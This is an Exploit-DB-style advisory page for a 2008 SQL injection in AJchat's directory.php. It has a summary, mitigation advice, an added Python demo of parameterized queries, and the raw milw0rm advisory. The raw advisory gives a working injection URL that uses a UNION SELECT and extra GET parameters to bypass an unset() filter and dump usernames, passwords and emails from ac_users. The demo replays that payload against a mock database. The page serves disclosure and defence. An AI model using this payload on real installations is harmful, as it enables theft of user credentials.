AJchat Remote Sql Injection
Vendor: AJchat
By: Eugene Minaev
CVSS: 9.3 (HIGH)
CWE: 89
Product Name: AJchat
Affected Version From: Prior to 2.0
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: cpe:a:ajchat:ajchat
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

AJchat Remote Sql Injection using unset() bug

AJchat's directory.php takes a GET parameter s that is meant to be a single letter A..Z; when the value fails that check the script drops it with unset(). The published exploit (raw advisory below) sends a SQL payload in s together with two extra numeric GET parameters, 5861526=1 and 5863704=1, so that the unfiltered value reaches the database query, and uses a UNION SELECT to read id, username, password and email from the ac_users table. An attacker can therefore read arbitrary data from the application's database, including user credentials. This vulnerability affects AJchat versions prior to 2.0.

Mitigation:

Upgrade to AJchat version 2.0 or later. Until the upgrade is applied, validate s against a strict whitelist before it is used and pass it to the database as a bound parameter rather than by string concatenation.
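The block below is an added example, not code from AJchat or from the advisory. It re-implements the advisory's A..Z filter in Python, runs the advisory's exact payload against a constructed SQLite stand-in for the ac_users table to show what the UNION SELECT returns, and contrasts that with a whitelisted, parameterized lookup of the kind the mitigation calls for. The directory table, the shape of the lookup query and the sample rows are assumptions; the real directory.php query is not shown on the page.

```python
"""Added example (not AJchat or advisory code): the A..Z filter from the
advisory next to the UNION query the advisory's payload produces, run
against a constructed SQLite stand-in for the ac_users table."""
import sqlite3

# Payload exactly as it appears in the advisory. The trailing /* opens a
# comment that swallows whatever the original query had after the value.
PAYLOAD = ("'and 1 = 2 union select concat_ws(char(59),id,username,password,email),"
           "null from ac_users/*")


def passes_letter_filter(s):
    """Python equivalent of the PHP check: keep s only if, after
    upper-casing, it is exactly one character in A..Z; the PHP drops
    anything else with unset()."""
    s = s.upper()
    return len(s) == 1 and "A" <= s <= "Z"


def build_db():
    """Constructed schema: a directory table (assumed; AJchat's real one is
    not on the page) plus ac_users with the four columns the payload names."""
    conn = sqlite3.connect(":memory:")
    # MySQL's concat_ws is not built into every SQLite release, so register
    # an equivalent so the advisory's payload runs unchanged.
    conn.create_function("concat_ws", -1,
                         lambda sep, *cols: sep.join(str(c) for c in cols))
    conn.executescript("""
        CREATE TABLE directory(name TEXT, info TEXT);
        INSERT INTO directory VALUES ('Alice', 'ops'), ('Bob', 'dev');
        CREATE TABLE ac_users(id INTEGER, username TEXT, password TEXT, email TEXT);
        INSERT INTO ac_users VALUES (1, 'admin', 'hash-one', 'admin@example.org');
        INSERT INTO ac_users VALUES (2, 'guest', 'hash-two', 'guest@example.org');
    """)
    return conn


def lookup_vulnerable(conn, s):
    """Assumed query shape: the letter is spliced into the WHERE clause as a
    LIKE prefix. This string concatenation is what the UNION payload needs."""
    sql = f"SELECT name, info FROM directory WHERE name LIKE '{s}%'"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, s):
    """Whitelist first, then bind the value as a parameter: the payload
    never becomes SQL, and even a valid letter is never concatenated."""
    if not passes_letter_filter(s):
        return []
    return conn.execute(
        "SELECT name, info FROM directory WHERE name LIKE ?",
        (s.upper() + "%",),
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("filter accepts payload:", passes_letter_filter(PAYLOAD))
    for row in lookup_vulnerable(db, PAYLOAD):
        print("leaked:", row[0])
    print("hardened:", lookup_hardened(db, PAYLOAD))
```

Note that the filter itself rejects the payload (it is far longer than one character), so the bypass in the advisory lies in how the script behaves after unset(), which the advisory does not spell out; the example therefore feeds the payload straight into the concatenated query to show the effect once it gets there. The hardened lookup is safe for both reasons at once: the whitelist keeps anything but a letter out, and the bound parameter means even a letter is never spliced into SQL text.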
Exploit-DB raw data:

----[ AJchat Remote Sql Injection using unset() bug ... ITDefence.ru Antichat.ru ]

							AJchat Remote Sql Injection using unset() bug
							Eugene Minaev underwater@itdefence.ru 
				___________________________________________________________________
			____/  __ __ _______________________ _______  _______________    \  \   \
			/ .\  /  /_// //              /        \       \/      __       \   /__/   /
			/ /     /_//              /\        /       /      /         /     /___/
			\/        /              / /       /       /\     /         /         /
			/        /               \/       /       / /    /         /__       //\
			\       /    ____________/       /        \/    __________// /__    // /   
			/\\      \_______/        \________________/____/  2007    /_//_/   // //\
			\ \\                                                               // // /
			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . 
			. \_\\________[________________________________________]_________//_//_/ . .
			
<?php
// Filter on the "s" parameter in directory.php: only a single
// character in A..Z (after upper-casing) is accepted; anything
// else is dropped with unset().
if (isset($_GET["s"])) {
    $_GET["s"] = strtoupper($_GET["s"]);
    if (strlen($_GET["s"]) == 1 && $_GET["s"] >= 'A' && $_GET["s"] <= 'Z') {
        // nothing
    } else {
        unset($_GET['s']);
    }
}
?>
		
As we can see, $_GET['s'] can only contain A..Z characters; otherwise the script unset()s it.
		
		calc.exe s
		5861526=1
		5863704=1
		
		directory.php?s='and 1 = 2 union select concat_ws(char(59),id,username,password,email),null+from+ac_users/*&5861526=1&5863704=1

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

# milw0rm.com [2008-01-11]